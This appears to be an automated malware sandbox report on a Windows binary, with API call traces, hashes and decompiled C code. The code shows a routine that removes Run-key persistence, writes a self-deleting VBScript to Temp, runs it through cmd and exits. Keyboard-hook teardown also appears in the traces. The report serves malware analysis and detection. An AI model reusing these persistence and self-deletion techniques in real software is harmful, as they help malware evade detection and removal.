                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                        • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                        • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310,?,Function_0001B310,?,Function_0001B310,?,Function_0001B310,00000000,?,?,?,00000000), ref: 0040B28B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,Function_0001B310,?,Function_0001B310,00000000,?,?,?,00000000), ref: 0040B29B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Function_0001B310,?,Function_0001B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Function_0001B310,?,Function_0001B310,00000000,?,?,?), ref: 0040B2B8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,Function_0001B310,?,Function_0001B310,00000000), ref: 0040B2C5
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_0001B310), ref: 0040B2D2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                        • String ID: /stext "
                                        • API String ID: 1338134179-3856184850
                                        • Opcode ID: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                        • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                        • Opcode Fuzzy Hash: 5ffcdff64bcc1c6a9a9668ba802c80dca196d14f5aa7d340fadde5d72a710b36
                                        • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004085AC, Relevance: 138.6, APIs: 63, Strings: 16, Instructions: 308registryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 20%
                                        			E004085AC(char _a4) {
				signed int _v5;
				char _v6;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				void* _v104;
				void* _v120;
				short _v640;
				void* _t63;
				char* _t65;
				WCHAR* _t68;
				char* _t69;
				char* _t71;
				char* _t74;
				char* _t75;
				char* _t76;
				char* _t77;
				signed int* _t79;
				char* _t80;
				char* _t81;
				signed int _t82;
				short* _t84;
				char* _t85;
				char* _t86;
				WCHAR* _t88;
				char* _t89;
				char* _t90;
				short* _t154;
				void* _t161;
				void* _t162;
				void* _t164;
				void* _t166;

				_t63 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t63 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t63 = E0041050F(_t63);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E00412BEE(_t63);
				}
				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, _t94, _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
				_t162 = _t161 + 0x1c;
				if(_t65 == 0) {
					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t65);
				_v5 = 1;
				_t68 = SetFileAttributesW( &_v640, 0x80);
				if(_t68 == 0) {
					_v5 = _v5 & _t68;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t68 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t68, 0x80);
				}
				_t69 =  &_v6;
				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
				_t71 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
				L0041416A();
				_t164 = _t162 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
				if(_v5 != 0) {
					_t88 =  &_v640;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
					_t89 =  &_v72;
					L0041416A();
					_t90 =  &_v24;
					L00414146();
					_t164 = _t164 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t154 = L"\"\n";
				_t74 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
				_t75 =  &_v72;
				L00414146();
				_t76 =  &_v56;
				L00414146();
				_t166 = _t164 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t76 != 0) {
					_t85 =  &_v72;
					L0041416A();
					_t86 =  &_v56;
					L00414146();
					_t166 = _t166 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t77 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
				_t79 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
				_t80 =  &_v24;
				L0041414C();
				_t81 =  &_v72;
				L0041414C();
				_t82 =  &_v56;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
				if(_t84 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
					if(_t84 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t84;
			}





































                                        0x004085b5
                                        0x004085c1
                                        0x004085c8
                                        0x004085c8
                                        0x004085d4
                                        0x004085d6
                                        0x004085d6
                                        0x004085e2
                                        0x004085e9
                                        0x004085f0
                                        0x004085f5
                                        0x00408605
                                        0x0040860f
                                        0x00408613
                                        0x0040861c
                                        0x00408621
                                        0x00408621
                                        0x0040862b
                                        0x0040862f
                                        0x0040863c
                                        0x00408641
                                        0x00408641
                                        0x0040864b
                                        0x0040864f
                                        0x00408660
                                        0x00408665
                                        0x00408665
                                        0x0040866f
                                        0x00408678
                                        0x00408698
                                        0x004086a0
                                        0x004086a5
                                        0x004086aa
                                        0x004086b6
                                        0x004086b6
                                        0x004086be
                                        0x004086c6
                                        0x004086df
                                        0x004086e3
                                        0x004086e7
                                        0x004086e9
                                        0x004086e9
                                        0x004086f7
                                        0x00408701
                                        0x00408709
                                        0x00408710
                                        0x00408710
                                        0x00408712
                                        0x00408720
                                        0x0040872b
                                        0x00408736
                                        0x00408741
                                        0x00408747
                                        0x00408753
                                        0x00408763
                                        0x00408768
                                        0x0040876e
                                        0x00408778
                                        0x00408783
                                        0x0040878d
                                        0x00408794
                                        0x0040879d
                                        0x004087a6
                                        0x004087aa
                                        0x004087af
                                        0x004087b6
                                        0x004087bf
                                        0x004087c8
                                        0x004087d1
                                        0x004087d1
                                        0x004087d7
                                        0x004087e4
                                        0x004087f0
                                        0x004087f7
                                        0x004087fb
                                        0x00408804
                                        0x00408808
                                        0x0040880d
                                        0x00408814
                                        0x0040881d
                                        0x00408826
                                        0x0040882f
                                        0x00408839
                                        0x00408843
                                        0x00408843
                                        0x00408850
                                        0x0040885a
                                        0x0040885e
                                        0x00408867
                                        0x00408870
                                        0x00408874
                                        0x00408879
                                        0x00408880
                                        0x00408889
                                        0x00408892
                                        0x00408892
                                        0x00408898
                                        0x004088a9
                                        0x004088b4
                                        0x004088c0
                                        0x004088c7
                                        0x004088cb
                                        0x004088d4
                                        0x004088d8
                                        0x004088e1
                                        0x004088e5
                                        0x004088f1
                                        0x004088fa
                                        0x00408903
                                        0x0040890c
                                        0x00408915
                                        0x0040891e
                                        0x0040892c
                                        0x00408938
                                        0x00408942
                                        0x0040894e
                                        0x00408955
                                        0x0040895f
                                        0x00408967
                                        0x00408974
                                        0x0040897d
                                        0x00408980
                                        0x00408980
                                        0x0040897d
                                        0x00408989
                                        0x00408992
                                        0x0040899b
                                        0x004089a5

                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                        • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                          • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                          • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                        • _wgetenv.MSVCRT ref: 00408720
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                        • exit.MSVCRT ref: 00408980
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
